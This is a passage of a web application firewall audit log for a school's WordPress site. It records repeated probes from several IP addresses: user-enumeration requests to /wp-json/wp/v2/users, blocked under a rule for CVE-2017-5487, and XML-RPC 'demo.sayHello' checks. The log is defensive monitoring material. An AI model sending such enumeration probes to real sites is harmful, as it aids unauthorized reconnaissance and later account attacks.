X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a4c5b820-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4c5b820-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498242401621 2505 (- - -) Stopwatch2: 1747498242401621 2505; combined=1342, p1=418, p2=899, p3=0, p4=0, p5=24, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4c5b820-Z-- --dd66fe06-A-- [17/May/2025:23:10:49 +0700] aCi1CRKi5m5upc8uMd4vcQAAANY 103.236.140.4 37654 103.236.140.4 8181 --dd66fe06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.170 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dd66fe06-C-- demo.sayHello --dd66fe06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd66fe06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498249422060 5357 (- - -) Stopwatch2: 1747498249422060 5357; combined=4005, p1=462, p2=3312, p3=40, p4=54, p5=80, sr=65, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd66fe06-Z-- --b60cc07e-A-- [17/May/2025:23:13:07 +0700] aCi1k-m4kjNN-hEbWjK4-gAAAEc 103.236.140.4 47346 103.236.140.4 8181 --b60cc07e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b60cc07e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b60cc07e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498387707539 3647 (- - -) Stopwatch2: 1747498387707539 3647; combined=1905, p1=607, p2=1266, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b60cc07e-Z-- --6e01fa2e-A-- [17/May/2025:23:13:11 +0700] aCi1l3yxdQCiyU1ENFe4CgAAAAU 103.236.140.4 47646 103.236.140.4 8181 --6e01fa2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.91 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6e01fa2e-C-- demo.sayHello --6e01fa2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e01fa2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498391792905 4681 (- - -) Stopwatch2: 1747498391792905 4681; combined=3354, p1=485, p2=2650, p3=27, p4=27, p5=109, sr=59, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e01fa2e-Z-- --a5c2e444-A-- [17/May/2025:23:13:57 +0700] aCi1xXyxdQCiyU1ENFe5IgAAAAE 103.236.140.4 50798 103.236.140.4 8181 --a5c2e444-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a5c2e444-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5c2e444-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498437203751 2517 (- - -) Stopwatch2: 1747498437203751 2517; combined=1164, p1=486, p2=654, p3=0, p4=0, p5=23, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5c2e444-Z-- --4cf7bf0f-A-- [17/May/2025:23:14:04 +0700] aCi1zHyxdQCiyU1ENFe5VgAAAAs 103.236.140.4 51294 103.236.140.4 8181 --4cf7bf0f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4cf7bf0f-C-- demo.sayHello --4cf7bf0f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cf7bf0f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498444623809 5846 (- - -) Stopwatch2: 1747498444623809 5846; combined=4281, p1=565, p2=3475, p3=31, p4=35, p5=102, sr=72, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cf7bf0f-Z-- --74a4707d-A-- [17/May/2025:23:19:49 +0700] aCi3Jem4kjNN-hEbWjLEoAAAAFI 103.236.140.4 46556 103.236.140.4 8181 --74a4707d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --74a4707d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74a4707d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498789135424 3412 (- - -) Stopwatch2: 1747498789135424 3412; combined=1846, p1=554, p2=1260, p3=0, p4=0, p5=32, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74a4707d-Z-- --bcf7e17a-A-- [17/May/2025:23:20:00 +0700] aCi3MBKi5m5upc8uMd49hAAAAMY 103.236.140.4 47260 103.236.140.4 8181 --bcf7e17a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bcf7e17a-C-- demo.sayHello --bcf7e17a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcf7e17a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498800240417 4891 (- - -) Stopwatch2: 1747498800240417 4891; combined=3731, p1=489, p2=2976, p3=38, p4=37, p5=122, sr=58, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcf7e17a-Z-- --927a3150-A-- [17/May/2025:23:21:46 +0700] aCi3mhKi5m5upc8uMd5AyAAAAM4 103.236.140.4 54524 103.236.140.4 8181 --927a3150-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --927a3150-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --927a3150-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498906856467 2217 (- - -) Stopwatch2: 1747498906856467 2217; combined=1115, p1=360, p2=730, p3=0, p4=0, p5=25, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --927a3150-Z-- --8fce1f58-A-- [17/May/2025:23:21:56 +0700] aCi3pHyxdQCiyU1ENFfEuQAAAAY 103.236.140.4 55170 103.236.140.4 8181 --8fce1f58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8fce1f58-C-- demo.sayHello --8fce1f58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fce1f58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498916501141 6155 (- - -) Stopwatch2: 1747498916501141 6155; combined=4745, p1=692, p2=3821, p3=41, p4=54, p5=82, sr=108, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fce1f58-Z-- --d9ba2557-A-- [17/May/2025:23:22:00 +0700] aCi3qBKi5m5upc8uMd5BGAAAAME 103.236.140.4 55408 103.236.140.4 8181 --d9ba2557-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d9ba2557-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9ba2557-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498920283865 2652 (- - -) Stopwatch2: 1747498920283865 2652; combined=1161, p1=390, p2=749, p3=0, p4=0, p5=22, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9ba2557-Z-- --7497c470-A-- [17/May/2025:23:22:03 +0700] aCi3qwTOsBn9MSWb6WL8JAAAAJg 103.236.140.4 55622 103.236.140.4 8181 --7497c470-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7497c470-C-- demo.sayHello --7497c470-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7497c470-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498923883447 6572 (- - -) Stopwatch2: 1747498923883447 6572; combined=5079, p1=694, p2=4149, p3=47, p4=60, p5=78, sr=63, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7497c470-Z-- --1f136712-A-- [17/May/2025:23:23:02 +0700] aCi35hKi5m5upc8uMd5C6AAAANI 103.236.140.4 59662 103.236.140.4 8181 --1f136712-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1f136712-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f136712-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498982289774 2636 (- - -) Stopwatch2: 1747498982289774 2636; combined=1272, p1=423, p2=815, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f136712-Z-- --adcf343c-A-- [17/May/2025:23:23:06 +0700] aCi36um4kjNN-hEbWjLJlAAAAFY 103.236.140.4 59998 103.236.140.4 8181 --adcf343c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --adcf343c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --adcf343c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498986978240 2259 (- - -) Stopwatch2: 1747498986978240 2259; combined=878, p1=294, p2=559, p3=0, p4=0, p5=25, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --adcf343c-Z-- --600c224f-A-- [17/May/2025:23:23:10 +0700] aCi37nyxdQCiyU1ENFfGyAAAAA8 103.236.140.4 60242 103.236.140.4 8181 --600c224f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --600c224f-C-- demo.sayHello --600c224f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --600c224f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498990394770 4287 (- - -) Stopwatch2: 1747498990394770 4287; combined=3074, p1=487, p2=2426, p3=24, p4=25, p5=66, sr=49, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --600c224f-Z-- --860b0a56-A-- [17/May/2025:23:23:14 +0700] aCi38um4kjNN-hEbWjLJyQAAAEo 103.236.140.4 60534 103.236.140.4 8181 --860b0a56-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --860b0a56-C-- demo.sayHello --860b0a56-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --860b0a56-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498994523770 5270 (- - -) Stopwatch2: 1747498994523770 5270; combined=3827, p1=487, p2=3117, p3=37, p4=31, p5=90, sr=61, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --860b0a56-Z-- --29db050b-A-- [17/May/2025:23:23:53 +0700] aCi4Gem4kjNN-hEbWjLKsQAAAEI 103.236.140.4 35068 103.236.140.4 8181 --29db050b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --29db050b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29db050b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499033762228 5554 (- - -) Stopwatch2: 1747499033762228 5554; combined=1430, p1=465, p2=810, p3=0, p4=0, p5=155, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29db050b-Z-- --76fd393b-A-- [17/May/2025:23:24:01 +0700] 